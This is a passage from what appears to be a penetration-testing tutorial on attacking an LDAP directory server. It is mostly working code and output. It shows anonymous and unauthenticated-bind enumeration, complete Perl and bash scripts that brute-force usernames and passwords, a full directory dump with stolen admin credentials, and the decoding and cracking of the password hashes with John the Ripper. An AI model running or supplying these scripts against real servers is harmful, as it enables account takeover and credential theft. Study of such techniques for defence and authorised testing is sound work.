cn=training,dc=acme,dc=com
ou=helpdesk,cn=support,dc=acme,dc=com
ou=escalation,cn=support,dc=acme,dc=com
ou=instructors,cn=training,dc=acme,dc=com
ou=course
cn=chris
cn=sam
cn=justin
cn=heath
cn=nick
cn=eric
cn=tim
cn=vaj
sam@asus:~% 

In this case anonymous bind is allowed and we are able to traverse the directory tree as we would if we were a authenticated user. We can go further by pilfering through the directory and find all the user and user names on the server.

Unauthenticated Bind Enumeration (DN with no password)

Lets try a search for all user id's in the directory subtree using the DN `cn=admin,dc=acme,dc=com` and no password.

root@asus:~% ldapsearch -x -D "cn=admin,dc=acme,dc=com" -s sub "cn=*" -h 148.32.42.5 | awk '/uid: /{print $2}' | nl
     1 esampson
     2 cchiu
     3 skumar
     4 jsmith
     5 hahmad
     6 nolsen
     7 ealvarez
     8 tmoreau
     9 vpatel
root@asus:~% 

This what you will see if you come upon a server where unauthenticated binds are disallowed:

sam@asus:~% ldapsearch -x -D "cn=admin,dc=acme,dc=com" -s sub "cn=*" -h 148.32.42.5
ldap_bind: Server is unwilling to perform (53)
additional info: unauthenticated bind (DN with no password) disallowed
sam@asus:~% 

Unauthenticated Binds are only allowed if Anonymous Binds are also enabled.

Authenticated Bind Enumeration

For a authenticated LDAP bind we need to crack some passwords, preferably the ldap administrators. We also need identify the authentication used such as md5 ,etc.

We can get the authentication method by using a bogus password and trying to login

sam@asus:~% ldapwhoami -h ldap.acme.com -w "abcd123"
SASL/DIGEST-MD5 authentication started
ldap_sasl_interactive_bind_s: Invalid credentials (49)
 additional info: SASL(-13): user not found: no secret in database
sam@asus:~%

Dictonary attack to find valid users

We can use Perl and the Net::LDAP module to check for valid users on the remote LDAP server. The simple script below searches for valid users and returns a distinguished name if found. This will help us in our next step which is to guess passwords for the accounts we find in this search. You can get some ideas on username guessing from Enumerating UNIX usernames

#!/usr/bin/env perl
use strict;
use warnings;
use Net::LDAP;

my $server   = "ldap.acme.com";
my $base     = "dc=acme,dc=com";
my $filename = "users.txt";

open(my $fh, '<', $filename) or die $!;

my $ldap = Net::LDAP->new($server) or die $@;

while (my $word = <$fh>) {
    chomp($word);

    my $search = $ldap->search(
        base    => $base,
        scope   => 'sub',
        filter  => '(&(uid='.$word.'))',
        attrs   => ['dn']
    );

    print "[+] Found valid login name $word\n" if(defined($search->entry));
}

We now run the script and fuzz for users on the server

sam@asus:~/public_html% ./ldap-users.pl 
[+] Found valid login name twest
[+] Found valid login name vpatel
[+] Found valid login name hahmad
[+] Found valid login name ealvarez
[+] Found valid login name skumar
[+] Found valid login name tmoreau
[+] Found valid login name jsmith
sam@asus:~/public_html% 

Dictonary attack to find valid password

Once we have a valid list of users on the server, we can move forward to search for valid user and password combinations. We can use Perl and Net::LDAP to query the server and test for valid logins.

#!/usr/bin/env perl
use strict;
use warnings;
use Net::LDAP;

my $server   = "ldap.acme.com";
my $user     = "twest";
my $base     = "dc=acme,dc=com";
my $filename = "wordlist.txt";

open(my $fh, '<', $filename) or die $!;

my $ldap = Net::LDAP->new($server) or die $@;

my $search = $ldap->search(
    base    => $base,
    scope   => 'sub',
    filter  => '(&(uid='.$user.'))',
    attrs   => ['dn']
);

if(defined($search->entry)) {

    my $user_dn = $search->entry->dn;

    print "[*] Searching for valid LDAP login for $user_dn...\n";

    while (my $word = <$fh>) {
        chomp($word);

        my $mesg = $ldap->bind($user_dn, password => $word);

        if ($mesg and $mesg->code() == 0) {
            print "[+] Found valid login $user_dn / $word\n";
            exit;
        }
    }
} else {
    print "[x] $user is not a valid LDAP user...\n";
    exit;
}

print "[x] No valid LDAP logins found...\n";

Running the script against the server we get the following

sam@asus:~/public_html% ./ldap-passwords.pl 
[*] Searching for valid LDAP login for cn=tim west,ou=channel,cn=sales,dc=acme,dc=com...
[+] Found valid login cn=tim west,ou=channel,cn=sales,dc=acme,dc=com / password
sam@asus:~/public_html% 

Using ldapwhoami to gain access

Here is a script to test a list of passwords against a valid Distingushed Name (DN) on a remote host.

#!/usr/bin/env bash
##
## Dictonary password attack against a valid DN using ldapwhoami
##

dn="cn=admin,dc=acme,dc=com"
host="ldap.acme.com"
list="wordlist.txt"

file=$(<${list})
wordlist=(`echo $file | sed 's/ /\n/g'`)

for word in "${wordlist[@]}"
do
    ldapwhoami -h ${host} -D "${dn}" -w "${word}" 2>/dev/null
    
    if [ $? == 0 ]
    then
        echo "Password \`${word}\` found for user"
    fi
done

if we run the shell script we should see this on success.

root@asus:~/pentest_notes% ./ldapwhoami-dictonary.sh 
dn:cn=admin,dc=acme,dc=com
Password `ldapadmin` found for user
root@asus:~/pentest_notes% 

Dumping data

If we do an ldap search with our user and pass with a search filter of (objectClass=*), a dump of the whole directory tree from admin.

root@asus:~/pentest_notes% ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com
# extended LDIF
#
# LDAPv3
# base  (default) with scope subtree
# filter: (objectclass=*)
# requesting: * 
#

# acme.com
dn: dc=acme,dc=com
objectClass: top
objectClass: dcObject
objectClass: organization
o: Acme
dc: acme

# admin, acme.com
dn: cn=admin,dc=acme,dc=com
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9SW5uaE9PdFRmdENveWhPUDFTUFVnSnNMZ3ZxSVA3aUw=

# ldapusers, acme.com
dn: cn=ldapusers,dc=acme,dc=com
...
root@asus:~/pentest_notes%

Cracking OpenLDAP Passwords

the password hashes are encoded in base64 we can easly decode the string to extract the hash

root@asus:~/pentest_notes% echo "e01ENX0wTHVBcXJ1R0diYmpVUlB3TG5KMUt3PT0=" | base64 -d
{MD5}0LuAqruGGbbjURPwLnJ1Kw==
root@asus:~/pentest_notes%

All these hashes can be loaded up in JTR and cracked to get shell access on the remote system.

root@asus:~/src/john/run% ./john --wordlist=/home/sam/pentest_notes/rockyou.txt /home/sam/openldap.txt       
Using default input encoding: UTF-8
Loaded 8 password hashes with no different salts (Raw-MD5 [MD5 128/128 SSE4.1 4x3])
Remaining 7 password hashes with no different salts
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
password         (hahmad)
education        (ealvarez)
kumar            (skumar)
jsmith           (jsmith)
instructor       (tmoreau)
hindu            (vpatel)
6g 0:00:00:04 DONE (2019-01-20 22:18) 1.360g/s 3252Kp/s 3252Kc/s 3363KC/s  filimani.¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
root@asus:~/src/john/run%